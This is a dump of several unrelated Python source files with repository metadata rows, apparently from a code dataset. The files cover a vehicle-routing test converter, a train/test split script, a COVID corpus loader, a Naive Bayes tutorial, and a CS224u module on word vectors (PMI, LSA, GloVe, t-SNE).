        dests_num = int(in_file.readline())
        nodes_num = magazines_num + dests_num
        # Reading weights of destinations.
        weights = np.zeros((nodes_num), dtype=int)
        if capacity:
            w = [int(s) for s in in_file.readline().split() if s.isdigit()]
            for i in range(dests_num):
                weights[i + magazines_num] = w[i]
        # Reading costs.
        costs = np.zeros((nodes_num, nodes_num), dtype=int)
        for i in range(nodes_num):
            costs[i] = [int(s) for s in in_file.readline().split() if s.isdigit()]
        # Reading vehicles.
        vehicles = int(in_file.readline())
        capacities = np.ones((vehicles), dtype=int)
        if capacity:
            capacities = [int(s) for s in in_file.readline().split() if s.isdigit()]
    # Internal indices: magazines first, then destinations.
    sources = [i for i in range(magazines_num)]
    dests = [i for i in range(magazines_num, nodes_num)]
    return VRPProblem(sources, costs, capacities, dests, weights)
# Creates one-file test from format with graph.
# in_path - test input file
# graph_path - graph input file
# out_path - output
# capacity - True if vehicles have capacities, False otherwise
def create_test(in_path, graph_path, out_path, capacity = True):
    """Convert a graph-based test (test file + graph file) into the
    self-contained one-file format read by read_test().

    in_path   -- test input file
    graph_path -- graph input file
    out_path  -- destination for the generated one-file test
    capacity  -- False to omit the weight and capacity lines
    """
    test = read_full_test(in_path, graph_path, capacity)
    out_file = open(out_path, 'w+')
    # Number of magazines.
    out_file.write(str(len(test.sources)) + '\n')
    # Number of destinations..
    out_file.write(str(len(test.dests)) + '\n')
    # Weights of destinations.
    if capacity:
        for dest in test.dests:
            out_file.write(str(test.weights[dest]) + ' ')
        out_file.write('\n')
    # Costs.
    n = len(test.sources) + len(test.dests)
    for i in range(n):
        for j in range(n):
            out_file.write(str(test.costs[i][j]) + ' ')
        out_file.write('\n')
    # Vehicles.
    out_file.write(str(len(test.capacities)) + '\n')
    if capacity:
        for i in range(len(test.capacities)):
            out_file.write(str(test.capacities[i]) + ' ')
        out_file.write('\n')
    out_file.close()
| [
"M.Borowski282@gmail.com"
] | M.Borowski282@gmail.com |
a853bd82905b1a57a3ffd8bd9d2f4f90ffd696ae | c95021e80235610f448c31318a6a79fef1662b6f | /Tarea2/FileCreator.py | a42f293f9698021d2ef9117c72c181cd8c2f439f | [] | no_license | diegobano/Inteligencia | c02c5941c33b5d71bc0f45d43f06bb81be04a5fe | 90f2b0a8b27e9b8088ae00643b24af91475cef42 | refs/heads/master | 2021-01-20T13:26:13.645567 | 2017-06-18T04:40:45 | 2017-06-18T04:40:45 | 90,488,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | py | import numpy as np
import random
# Load the 5500x49 dataset: 48 feature columns plus a class label in
# column 48 (labels 1..11, given the 11 bins below).
# NOTE: this script is Python 2 (print statements; '/' is integer division).
db = np.zeros((5500, 49))
f = open("sensorless_tarea2.txt", "r")
for (i, line) in enumerate(f):
    db[i] = line.split(",")
f.close()
# Per-class counts over the whole dataset.
db_pbs = [0] * 11
for i in range(len(db)):
    db_pbs[int(db[i, 48])-1] += 1
# Initial random 80/20 split into training (ex) and test sets.
random.shuffle(db)
ex = db[0:(len(db)/10)*8,:]
ex_pbs = [0] * 11
test = db[(len(db)/10)*8:, :]
test_pbs = [0] * 11
for i in range(len(ex)):
    ex_pbs[int(ex[i, 48])-1] += 1
for i in range(len(test)):
    test_pbs[int(test[i, 48])-1] += 1
# Rejection sampling: reshuffle until both splits match the global class
# distribution to within `acc` for every class.
acc = 0.015
done = True
while True:
    for i in range(11):
        if abs(float(db_pbs[i])/sum(db_pbs) - float(ex_pbs[i])/sum(ex_pbs)) > acc or\
           abs(float(db_pbs[i]) / sum(db_pbs) - float(test_pbs[i]) / sum(test_pbs)) > acc:
            done = False
            break
        done = True
    if done:
        break
    print len(db)
    random.shuffle(db)
    ex = db[0:(len(db) / 10) * 8, :]
    ex_pbs = [0] * 11
    test = db[(len(db) / 10) * 8:, :]
    test_pbs = [0] * 11
    for i in range(len(ex)):
        ex_pbs[int(ex[i, 48]) - 1] += 1
    for i in range(len(test)):
        test_pbs[int(test[i, 48]) - 1] += 1
# Report the class counts of the full set and both splits.
print db_pbs
print ex_pbs
print test_pbs
# Write the training split as comma-separated rows.
ex_file = open("training.txt", "w")
for i in ex:
    for el in range(48):
        ex_file.write(str(i[el]))
        ex_file.write(",")
    ex_file.write(str(i[48]))
    ex_file.write("\n")
ex_file.close()
# Write the test split in the same format.
test_file = open("tester.txt", "w")
for i in test:
    for el in range(48):
        test_file.write(str(i[el]))
        test_file.write(",")
    test_file.write(str(i[48]))
    test_file.write("\n")
test_file.close()
"diego.r.bano@hotmail.com"
] | diego.r.bano@hotmail.com |
907d7eef1ed604a686dd3e46f859509d4d807ec7 | 479ed684323748ca54ce0ab995945b19777a2e86 | /src/corpus.py | b3778b8632a76bf997e3fc78e3107d77cb2eb370 | [] | no_license | cerisara/covid | c0d92d500bbce39c7baf3f68cc67fdef67d6de4b | 56261198556e2a0c71fb775c0ef8ba003060a6a2 | refs/heads/master | 2021-05-18T00:55:39.919731 | 2020-03-29T17:26:21 | 2020-03-29T17:26:21 | 251,034,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,264 | py | import glob
import json
curfile=""
def loadData(full=False):
    """Yield one article at a time as a list of body-text paragraph strings.

    full=False reads the bundled sample JSON files from ../sampdata;
    full=True reads the complete dumps from the hard-coded /data/xtof/...
    directories.  The module-level `curfile` global tracks the file
    currently being processed.  Files that fail to load or lack the
    expected keys are reported and skipped.
    """
    global curfile
    if full:
        files = []
        files += [f for f in glob.glob("/data/xtof/corpus/covid/biorxiv_medrxiv/*.json")]
        files += [f for f in glob.glob("/data/xtof/corpus/covid/comm_use_subset/*.json")]
        files += [f for f in glob.glob("/data/xtof/corpus/covid/custom_license/*.json")]
        files += [f for f in glob.glob("/data/xtof/corpus/covid/noncomm_use_subset/*.json")]
    else:
        files = [f for f in glob.glob("../sampdata/*.json")]
    for f in files:
        curfile = f
        try:
            with open(f, "r") as ff:
                o = json.load(ff)
            # Article JSON carries keys such as body_text, abstract, metadata.
            utts = [oo['text'] for oo in o['body_text']]
        except Exception:
            # Was a bare `except:` wrapped around the yield, which also
            # swallowed GeneratorExit/KeyboardInterrupt; narrowed and the
            # yield moved out so closing the generator is not misreported.
            print("ERROR file "+f)
            continue
        yield utts
"""
distrib de la longueur des chiffres sur tout le corpus:
Counter({1: 3745400, 2: 2617545, 4: 997545, 3: 789312, 0: 187201, 6: 22878, 5: 18303, 8: 5994, 7: 2921, 9: 629, 10: 194, 11: 141, 12: 57, 13: 39, 14: 26, 15: 18, 16: 8, 19: 1, 17: 1, 38: 1, 48: 1, 25: 1})
"""
| [
"cerisara@loria.fr"
] | cerisara@loria.fr |
1b7274303f6149db5acf42528a46f785df6e2c5e | 64de57b0fdce14bba94296191876bdb655e577b9 | /Part 3 - Classification/Section 18 - Naive Bayes/naive_bayes.py | 174f2ae79ff689bd1764a60d75c3b833edc3dd5b | [] | no_license | cszatmary/machine-learning-exercises | cfb341aaec4cf9dc1580ad49a28738a0b399d674 | 89a6b319b2bcadf3cf5ad1c18c1b4513b0878251 | refs/heads/master | 2021-09-22T05:20:20.214082 | 2018-09-05T21:36:38 | 2018-09-05T21:36:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | # Naive Bayes
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import confusion_matrix
from matplotlib.colors import ListedColormap
# Importing the dataset (expects Social_Network_Ads.csv in the working
# directory; features are taken from columns 2-3, the label from column 4).
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values
# Splitting the dataset into the Training set and Test set (75/25, fixed seed).
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
# Feature Scaling: fit on the training set only, then apply to both splits.
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Fitting Naive Bayes to the Training set
classifier = GaussianNB()
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
cm = confusion_matrix(y_test, y_pred)
def graph_results(X_set, y_set, title):
    """Plot the classifier's decision regions over a fine grid with the
    points of X_set/y_set overlaid, coloured by class.

    Uses the module-level `classifier`; assumes two features (axes are
    labelled Age / Estimated Salary) and two classes (red/green).
    """
    # Grid covering the data range with a 1-unit margin, step 0.01.
    X1, X2 = np.meshgrid(np.arange(start=X_set[:, 0].min() - 1, stop=X_set[:, 0].max() + 1, step=0.01),
                         np.arange(start=X_set[:, 1].min() - 1, stop=X_set[:, 1].max() + 1, step=0.01))
    # Classify every grid point and shade the two decision regions.
    plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
                 alpha=0.75, cmap=ListedColormap(('red', 'green')))
    plt.xlim(X1.min(), X1.max())
    plt.ylim(X2.min(), X2.max())
    # Scatter the observations, coloured by their true class.
    for i, j in enumerate(np.unique(y_set)):
        plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
                    c=ListedColormap(('red', 'green'))(i), label=j)
    plt.title(title)
    plt.xlabel("Age")
    plt.ylabel("Estimated Salary")
    plt.legend()
    plt.show()
# Visualising the Training set results
graph_results(X_train, y_train, "Naive Bayes (Training set)")
# Visualising the Test set results
graph_results(X_test, y_test, "Naive Bayes (Test set)")
| [
"cs@christopherszatmary.com"
] | cs@christopherszatmary.com |
83b0d45f575965f1b527a445029b7871e3ba7cf0 | 3b45ba8255f9ecbca5235182b492dea7345f5f12 | /distributedwordreps.py | db4031e5585f241f520845285544baf11e904c4a | [] | no_license | tsnaomi/collaborative-reference | 812228664b7a9953abb687dfc0f768f5b19a8116 | c8c20810c4f4d154ecbbea6dd1bb6e52e437259e | refs/heads/master | 2021-01-21T13:04:11.206092 | 2016-04-21T00:38:36 | 2016-04-21T00:38:36 | 36,094,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,592 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# For CS224u, Stanford, Spring 2015 (Chris Potts)
# Exported from distributedwordreps.ipynb, which can
# also be viewed in HTML: distributedwordreps.html
######################################################################
import os
import sys
import csv
import copy
import random
import itertools
from operator import itemgetter
from collections import defaultdict
# Make sure you've got Numpy and Scipy installed:
import numpy as np
import scipy
import scipy.spatial.distance
from numpy.linalg import svd
# For visualization:
import matplotlib.pyplot as plt
# For clustering in the 'Word-sense ambiguities' section:
from sklearn.cluster import AffinityPropagation
######################################################################
# Reading in matrices
def build(src_filename, delimiter=',', header=True, quoting=csv.QUOTE_MINIMAL):
    """Read a delimited matrix file into (matrix, rownames, colnames).

    Each data row is "rowname, val1, val2, ...".  With header=True the
    first row supplies colnames (its leading cell is dropped); otherwise
    colnames is None.  Returns a float numpy matrix plus the name lists.
    """
    mat = []
    rownames = []
    colnames = None
    # `with open` replaces the Python-2-only file() call (which also leaked
    # the handle), and next()/a list comprehension replace reader.next() and
    # np.array(map(...)), which break under Python 3.
    with open(src_filename) as infile:
        reader = csv.reader(infile, delimiter=delimiter, quoting=quoting)
        if header:
            colnames = next(reader)[1: ]
        for line in reader:
            rownames.append(line[0])
            mat.append(np.array([float(x) for x in line[1: ]]))
    return (np.array(mat), rownames, colnames)
######################################################################
# Vector comparison
def euclidean(u, v):
    """Euclidean (L2) distance between vectors u and v.

    Delegates to scipy; the hand-rolled equivalent would be
    vector_length(u - v).
    """
    dist = scipy.spatial.distance.euclidean(u, v)
    return dist
def vector_length(u):
    """Return the Euclidean (L2) norm of vector u."""
    squared = np.dot(u, u)
    return np.sqrt(squared)

def length_norm(u):
    """Return u rescaled to unit Euclidean length."""
    norm = vector_length(u)
    return u / norm
def cosine(u, v):
    """Cosine distance between u and v: 1 - cos(angle between them).

    Delegates to scipy; the hand-rolled equivalent would be
    1.0 - np.dot(u, v) / (vector_length(u) * vector_length(v)).
    """
    dist = scipy.spatial.distance.cosine(u, v)
    return dist
def matching(u, v):
    """Matching coefficient: total elementwise minimum of u and v.

    scipy's implementation handles binary vectors only; this one is general.
    """
    return np.minimum(u, v).sum()

def jaccard(u, v):
    """Generalized Jaccard distance: 1 - sum(min(u,v)) / sum(max(u,v)).

    scipy's implementation handles binary vectors only; this one is general.
    """
    overlap = matching(u, v)
    total = np.sum(np.maximum(u, v))
    return 1.0 - (overlap / total)
def neighbors(word=None, mat=None, rownames=None, distfunc=cosine):
    """Rank every word in the VSM by its distance from `word`, nearest first.

    Returns a list of (word, distance) pairs sorted ascending by distance.
    Raises ValueError if `word` is not in rownames.
    """
    if word not in rownames:
        raise ValueError('%s is not in this VSM' % word)
    w = mat[rownames.index(word)]
    # range() instead of Python-2-only xrange so this also runs on Python 3.
    dists = [(rownames[i], distfunc(w, mat[i])) for i in range(len(mat))]
    return sorted(dists, key=itemgetter(1), reverse=False)
######################################################################
# Reweighting
def prob_norm(u):
    """Normalize u so its entries sum to 1 (a probability distribution)."""
    total = np.sum(u)
    return u / total
def pmi(mat=None, rownames=None, positive=True):
"""PMI on mat; positive=True does PPMI. rownames is not used; it's
an argument only for consistency with other methods used here"""
# Joint probability table:
p = mat / np.sum(mat, axis=None)
# Pre-compute column sums:
colprobs = np.sum(p, axis=0)
# Vectorize this function so that it can be applied rowwise:
np_pmi_log = np.vectorize((lambda x : _pmi_log(x, positive=positive)))
p = np.array([np_pmi_log(row / (np.sum(row)*colprobs)) for row in p])
return (p, rownames)
def _pmi_log(x, positive=True):
"""With positive=False, return log(x) if possible, else 0.
With positive=True, log(x) is mapped to 0 where negative."""
val = 0.0
if x > 0.0:
val = np.log(x)
if positive:
val = max([val,0.0])
return val
def tfidf(mat=None, rownames=None):
    """TF-IDF reweighting of mat (rows = terms, columns = documents).

    rownames is passed through untouched, for interface consistency with
    the other reweighting methods; returns (weighted_matrix, rownames).
    """
    colsums = np.sum(mat, axis=0)
    ndocs = mat.shape[1]
    weighted = np.array([_tfidf_row_func(row, colsums, ndocs) for row in mat])
    return (weighted, rownames)

def _tfidf_row_func(row, colsums, doccount):
    """TF-IDF values for one term row; IDF is 0 when the term appears in
    no document or in every document."""
    tf = row / colsums
    df = float(sum(1 for x in row if x > 0))
    if df == 0.0 or df == doccount:
        return tf * 0.0
    return tf * np.log(doccount / df)
######################################################################
# Dimensionality reduction
def lsa(mat=None, rownames=None, k=100):
    """Latent semantic analysis: SVD truncated column-wise to k dimensions.

    rownames is passed through only for interface consistency; returns
    (truncated_matrix, rownames).
    """
    U, S, _ = svd(mat, full_matrices=False)
    # Row vectors scaled by the top-k singular values.
    trunc = np.dot(U[:, :k], np.diag(S[:k]))
    return (trunc, rownames)
######################################################################
# Visualization
def tsne_viz(
    mat=None,
    rownames=None,
    indices=None,
    colors=None,
    output_filename=None,
    figheight=40,
    figwidth=50,
    display_progress=False):
    """2d plot of mat using tsne, with the points labeled by rownames,
    aligned with colors (defaults to all black).
    If indices is a list of indices into mat and rownames,
    then it determines a subspace of mat and rownames to display.
    Give output_filename a string argument to save the image to disk.
    figheight and figwidth set the figure dimensions.
    display_progress=True shows the information that the tsne method prints out."""
    if not colors:
        colors = ['black' for i in range(len(rownames))]
    temp = sys.stdout
    devnull = None
    if not display_progress:
        # Redirect stdout so that tsne doesn't fill the screen with its iteration info:
        devnull = open(os.devnull, 'w')
        sys.stdout = devnull
    try:
        tsnemat = tsne(mat)
    finally:
        # Always restore stdout and close the devnull handle (the original
        # leaked it and would leave stdout redirected if tsne raised).
        sys.stdout = temp
        if devnull is not None:
            devnull.close()
    # Plot coordinates:
    if not indices:
        indices = range(len(rownames))
    vocab = np.array(rownames)[indices]
    xvals = tsnemat[indices, 0]
    yvals = tsnemat[indices, 1]
    # Plotting:
    fig, ax = plt.subplots(nrows=1, ncols=1)
    # BUG FIX: honor the figheight/figwidth parameters; they were previously
    # ignored in favor of hard-coded values 40 and 50.
    fig.set_figheight(figheight)
    fig.set_figwidth(figwidth)
    ax.plot(xvals, yvals, marker='', linestyle='')
    # Text labels:
    for word, x, y, color in zip(vocab, xvals, yvals, colors):
        ax.annotate(word, (x, y), fontsize=8, color=color)
    # Output:
    if output_filename:
        plt.savefig(output_filename, bbox_inches='tight')
    else:
        plt.show()
######################################################################
# Semantic orientation method
def semantic_orientation(
    mat=None,
    rownames=None,
    seeds1=['bad', 'nasty', 'poor', 'negative', 'unfortunate', 'wrong', 'inferior'],
    seeds2=['good', 'nice', 'excellent', 'positive', 'fortunate', 'correct', 'superior'],
    distfunc=cosine):
    """Semantic-orientation scores for every word in the VSM.

    Each row is scored as (total distance to the seeds1 rows) minus
    (total distance to the seeds2 rows), so words closer to seeds1 get
    smaller scores.  Returns (word, score) pairs sorted ascending.
    """
    sm1 = so_seed_matrix(seeds1, mat, rownames)
    sm2 = so_seed_matrix(seeds2, mat, rownames)
    # range() instead of Python-2-only xrange so this also runs on Python 3.
    scores = [(rownames[i], so_row_func(mat[i], sm1, sm2, distfunc)) for i in range(len(mat))]
    return sorted(scores, key=itemgetter(1), reverse=False)
def so_seed_matrix(seeds, mat, rownames):
    """Rows of mat for the seed words present in rownames.

    Raises ValueError if none of the seeds appear in rownames.
    """
    found = []
    for word in seeds:
        if word in rownames:
            found.append(rownames.index(word))
    if not found:
        raise ValueError('The matrix contains no members of the seed set: %s' % ",".join(seeds))
    return mat[np.array(found)]
def so_row_func(row, sm1, sm2, distfunc):
    """Total distance from row to seed-matrix 1 minus total distance to
    seed-matrix 2 (negative means closer to seed set 1)."""
    toward1 = np.sum([distfunc(row, seed_row) for seed_row in sm1])
    toward2 = np.sum([distfunc(row, seed_row) for seed_row in sm2])
    return toward1 - toward2
######################################################################
# Disambiguation
def disambiguate(mat=None, rownames=None, minval=0.0):
    """Basic unsupervised disambiguation. minval sets what it means to occur in a column.

    Each word is split into pseudo-senses named "word_<clusterid>" by
    clustering the documents (columns) it occurs in; returns
    (new_mat, new_rownames), where each sense row keeps only the counts
    from its own cluster's documents.
    """
    clustered = defaultdict(lambda : defaultdict(int))
    # For each word, cluster the documents containing it:
    for w_index, w in enumerate(rownames):
        # Columns where this word "occurs" (value strictly above minval).
        doc_indices = np.array([j for j in range(mat.shape[1]) if mat[w_index,j] > minval])
        clust = cluster(mat, doc_indices)
        for doc_index, c_index in clust:
            w_sense = "%s_%s" % (w, c_index)
            clustered[w_sense][doc_index] = mat[w_index, doc_index]
    # Build the new matrix:
    new_rownames = sorted(clustered.keys())
    new_mat = np.zeros((len(new_rownames), mat.shape[1]))
    for i, w in enumerate(new_rownames):
        for j in clustered[w]:
            new_mat[i,j] = clustered[w][j]
    return (new_mat, new_rownames)
def cluster(mat, doc_indices):
    """Cluster the documents in `doc_indices` by their column vectors in
    `mat` using scikit-learn's AffinityPropagation; returns
    (doc_index, cluster_label) pairs."""
    # Transpose so each document (column) becomes one sample row for sklearn.
    X = mat[:, doc_indices].T
    # Other clustering algorithms can easily be swapped in:
    # http://scikit-learn.org/stable/modules/classes.html#module-sklearn.cluster
    clust = AffinityPropagation()
    clust.fit(X)
    return zip(doc_indices, clust.labels_)
######################################################################
# GloVe word representations
def randmatrix(m, n, lower=-0.5, upper=0.5):
    """Creates an m x n matrix of random values in [lower, upper]"""
    # Draw m*n uniform samples, then shape them into the requested matrix.
    flat = [random.uniform(lower, upper) for _ in range(m * n)]
    return np.array(flat).reshape((m, n))
def glove(
    mat=None, rownames=None,
    n=100, xmax=100, alpha=0.75,
    iterations=100, learning_rate=0.05,
    display_progress=False):
    """Basic GloVe. rownames is passed through unused for compatibility
    with other methods. n sets the dimensionality of the output vectors.
    xmax and alpha controls the weighting function (see the paper, eq. (9)).
    iterations and learning_rate control the SGD training.
    display_progress=True prints iterations and current error to stdout."""
    m = mat.shape[0]
    W = randmatrix(m, n) # Word weights.
    C = randmatrix(m, n) # Context weights.
    B = randmatrix(2, m) # Word and context biases.
    # NOTE(review): Python 2 code -- `range` returns a list here, which
    # random.shuffle mutates in place each epoch; Python 3 would need
    # `list(range(m))`.
    indices = range(m)
    for iteration in range(iterations):
        error = 0.0
        random.shuffle(indices)
        # Only nonzero co-occurrence cells contribute to the objective.
        for i, j in itertools.product(indices, indices):
            if mat[i,j] > 0.0:
                # Weighting function from eq. (9)
                weight = (mat[i,j] / xmax)**alpha if mat[i,j] < xmax else 1.0
                # Cost is J' based on eq. (8) in the paper:
                diff = np.dot(W[i], C[j]) + B[0,i] + B[1,j] - np.log(mat[i,j])
                fdiff = diff * weight
                # Gradients:
                wgrad = fdiff * C[j]
                cgrad = fdiff * W[i]
                wbgrad = fdiff
                wcgrad = fdiff
                # Updates:
                W[i] -= (learning_rate * wgrad)
                C[j] -= (learning_rate * cgrad)
                B[0,i] -= (learning_rate * wbgrad)
                B[1,j] -= (learning_rate * wcgrad)
                # One-half squared error term:
                error += 0.5 * weight * (diff**2)
        if display_progress:
            print "iteration %s: error %s" % (iteration, error)
    # Return the sum of the word and context matrices, per the advice
    # in section 4.2:
    return (W + C, rownames)
def glove_viz(mat=None, rownames=None, word_count=1000, iterations=10, n=50, display_progress=True):
    """Train GloVe on a random `word_count`-row sample of `mat` and render
    the learned vectors with tsne_viz."""
    glove_indices = random.sample(range(len(rownames)), word_count)
    glovemat, _ = glove(mat=mat[glove_indices, :], iterations=iterations, n=n)
    tsne_viz(mat=glovemat, rownames=np.array(rownames)[glove_indices])
######################################################################
# Shallow neural networks
from numpy import dot, outer
class ShallowNeuralNetwork:
    """One-hidden-layer feed-forward network trained by plain SGD
    backpropagation.  `afunc` is the activation for both layers and
    `d_afunc` its derivative expressed in terms of the activation value
    (default pair: tanh and 1 - z**2)."""
    def __init__(self, input_dim=0, hidden_dim=0, output_dim=0, afunc=np.tanh, d_afunc=(lambda z : 1.0 - z**2)):
        self.afunc = afunc
        self.d_afunc = d_afunc
        self.input = np.ones(input_dim+1) # +1 for the bias
        self.hidden = np.ones(hidden_dim+1) # +1 for the bias
        self.output = np.ones(output_dim)
        # Weight matrices initialized uniformly in [-0.5, 0.5].
        self.iweights = randmatrix(input_dim+1, hidden_dim)
        self.oweights = randmatrix(hidden_dim+1, output_dim)
        self.oerr = np.zeros(output_dim)
        self.ierr = np.zeros(input_dim+1)
    def forward_propagation(self, ex):
        """Run example `ex` through the network; returns a copy of the output layer."""
        self.input[ : -1] = ex # ignore the bias
        self.hidden[ : -1] = self.afunc(dot(self.input, self.iweights)) # ignore the bias
        self.output = self.afunc(dot(self.hidden, self.oweights))
        return copy.deepcopy(self.output)
    def backward_propagation(self, labels, alpha=0.5):
        """One gradient step toward `labels` at learning rate `alpha`;
        returns the half squared error for this example."""
        labels = np.array(labels)
        self.oerr = (labels-self.output) * self.d_afunc(self.output)
        herr = dot(self.oerr, self.oweights.T) * self.d_afunc(self.hidden)
        self.oweights += alpha * outer(self.hidden, self.oerr)
        self.iweights += alpha * outer(self.input, herr[:-1]) # ignore the bias
        return np.sum(0.5 * (labels-self.output)**2)
    def train(self, training_data, maxiter=5000, alpha=0.05, epsilon=1.5e-8, display_progress=False):
        """SGD over (example, labels) pairs until the epoch error drops
        below `epsilon` or `maxiter` epochs have run.
        NOTE: shuffles `training_data` in place; Python 2 print statements."""
        iteration = 0
        error = sys.float_info.max
        while error > epsilon and iteration < maxiter:
            error = 0.0
            random.shuffle(training_data)
            for ex, labels in training_data:
                self.forward_propagation(ex)
                error += self.backward_propagation(labels, alpha=alpha)
            if display_progress:
                print '\rcompleted iteration %s; error is %s' % (iteration, error),
                sys.stdout.flush()
            iteration += 1
        if display_progress:
            print ""
    def predict(self, ex):
        """Forward-propagate `ex` and return a copy of the output layer."""
        self.forward_propagation(ex)
        return copy.deepcopy(self.output)
    def hidden_representation(self, ex):
        """Forward-propagate `ex` and return the hidden layer (incl. bias unit)."""
        self.forward_propagation(ex)
        return self.hidden
def read_valence_arousal_dominance_lexicon(src_filename='distributedwordreps-data/Warriner_et_al emot ratings.csv'):
    """Read the Warriner et al. affect lexicon.

    Returns a dict mapping each word to
    {'valence': v, 'arousal': a, 'dominance': d}, where the 1-9 mean
    ratings are recentered at 5 and squashed with tanh into (-1, 1).
    """
    def rescaler(x):
        # Ratings are on a 1-9 scale centered at 5; map them into (-1, 1).
        return np.tanh(float(x) - 5)
    lex = {}
    # FIX: the original used the `file()` builtin (removed in Python 3)
    # and leaked the handle; `with open(...)` works everywhere and closes it.
    with open(src_filename) as f:
        for d in csv.DictReader(f):
            lex[d['Word']] = {'valence': rescaler(d['V.Mean.Sum']),
                              'arousal': rescaler(d['A.Mean.Sum']),
                              'dominance': rescaler(d['D.Mean.Sum'])}
    return lex
def build_supervised_dataset(mat=None, rownames=None, lex=None):
    """Pair each lexicon word found in `rownames` with its matrix row and
    its lexicon scores.  Returns (data, vocab) where data holds
    (row_vector, label_list) pairs."""
    data, vocab = [], []
    for word, scores in lex.items():
        if word not in rownames:
            continue
        vocab.append(word)
        # Sort by score name so the label vector has a stable column order.
        label_vec = [score for _, score in sorted(scores.items())]
        data.append((mat[rownames.index(word)], label_vec))
    return (data, vocab)
def sentiment_lexicon_example(
        mat=None,
        rownames=None,
        hidden_dim=100,
        maxiter=1000,
        output_filename=None,
        display_progress=False):
    """Train a ShallowNeuralNetwork to predict valence/arousal/dominance
    scores from word vectors, then t-SNE-plot the learned hidden
    representations colored by the sign pattern of the gold scores."""
    # Get the lexicon:
    lex = read_valence_arousal_dominance_lexicon()
    # Build the training data:
    sentidata, sentivocab = build_supervised_dataset(mat=mat, rownames=rownames, lex=lex)
    # Set up the network:
    sentinet = ShallowNeuralNetwork(input_dim=len(sentidata[0][0]), hidden_dim=hidden_dim, output_dim=len(sentidata[0][1]))
    # Train the network (deepcopy because train() shuffles its input in place):
    sentinet.train(copy.deepcopy(sentidata), maxiter=maxiter, display_progress=display_progress)
    # Build the new matrix of hidden representations:
    inputs, labels = zip(*sentidata)
    sentihidden = np.array([sentinet.hidden_representation(x) for x in inputs])
    # Visualize the results with t-SNE:
    def colormap(vals):
        """Simple way to distinguish the 2x2x2 possible labels -- could be done much better!"""
        signs = ['CC' if x < 0.0 else '00' for _, x in sorted(vals.items())]
        return "#" + "".join(signs)
    colors = [colormap(lex[word]) for word in sentivocab]
    tsne_viz(mat=sentihidden, rownames=sentivocab, colors=colors, display_progress=display_progress, output_filename=output_filename)
######################################################################
# Word similarity task
def word_similarity_evaluation(src_filename="distributedwordreps-data/wordsim353/combined.csv",
                               mat=None, rownames=None, distfunc=cosine):
    """Evaluate the VSM (`mat`, `rownames`) against WordSim-353 human
    similarity ratings.

    Human scores are negated so they point the same way as distances
    (more similar -> smaller distance); returns the Spearman rank
    correlation between the negated human scores and the model's
    pairwise distances (higher is better).
    """
    sims = defaultdict(list)
    vocab = set([])
    # FIX: the original used the `file()` builtin (removed in Python 3)
    # and leaked the handle; `with open(...)` works everywhere and closes it.
    with open(src_filename) as f:
        for d in csv.DictReader(f):
            w1 = d['Word 1']
            w2 = d['Word 2']
            if w1 in rownames and w2 in rownames:
                # Use negative of scores to align intuitively with distance functions:
                sims[w1].append((w2, -float(d['Human (mean)'])))
                sims[w2].append((w1, -float(d['Human (mean)'])))
                vocab.add(w1)
                vocab.add(w2)
    # Evaluate the matrix by creating a vector of all_scores for the
    # wordsim353 data and all_dists for mat's distances.
    all_scores = []
    all_dists = []
    for word in vocab:
        vec = mat[rownames.index(word)]
        vals = sims[word]
        cmps, scores = zip(*vals)
        all_scores += scores
        all_dists += [distfunc(vec, mat[rownames.index(w)]) for w in cmps]
    # Return just the rank correlation coefficient (index [1] would be the p-value):
    return scipy.stats.spearmanr(all_scores, all_dists)[0]
######################################################################
# Analogy completion task
def analogy_completion(a, b, c, mat=None, rownames=None, distfunc=cosine):
    """a is to b as c is to the prediction: rank every vocabulary item
    (except a, b, c) by its distance to (b - a) + c, closest first."""
    missing = [x for x in (a, b, c) if x not in rownames]
    if missing:
        raise ValueError('%s is not in this VSM' % missing[0])
    avec, bvec, cvec = (mat[rownames.index(x)] for x in (a, b, c))
    target_vec = (bvec - avec) + cvec
    candidates = []
    for i, w in enumerate(rownames):
        if w in (a, b, c):
            continue
        candidates.append((w, distfunc(target_vec, mat[i])))
    candidates.sort(key=itemgetter(1))
    return candidates
def analogy_evaluation(src_filename="distributedwordreps-data/question-data/gram1-adjective-to-adverb.txt",
                       mat=None, rownames=None, distfunc=cosine):
    """Run the a:b::c:d analogy benchmark in `src_filename` over the VSM;
    returns (mean reciprocal rank, {True: hits, False: misses})."""
    # Read in the data and restrict to problems we can solve:
    data = [line.split() for line in open(src_filename).read().splitlines()]
    data = [prob for prob in data if set(prob) <= set(rownames)]
    # Run the evaluation, collecting accuracy and rankings:
    results = defaultdict(int)
    ranks = []
    for a, b, c, d in data:
        predicted = analogy_completion(a, b, c, mat=mat, rownames=rownames, distfunc=distfunc)
        # print "%s is to %s as %s is to %s (actual is %s)" % (a, b, c, predicted, d)
        # Count a hit when the top-ranked candidate is the gold answer d.
        results[predicted[0][0] == d] += 1
        predicted_words, _ = zip(*predicted)
        ranks.append(predicted_words.index(d))
    # Return the mean reciprocal rank and the accuracy results:
    mrr = np.mean(1.0/(np.array(ranks)+1))
    return (mrr, results)
| [
"ciyang@server.fake"
] | ciyang@server.fake |
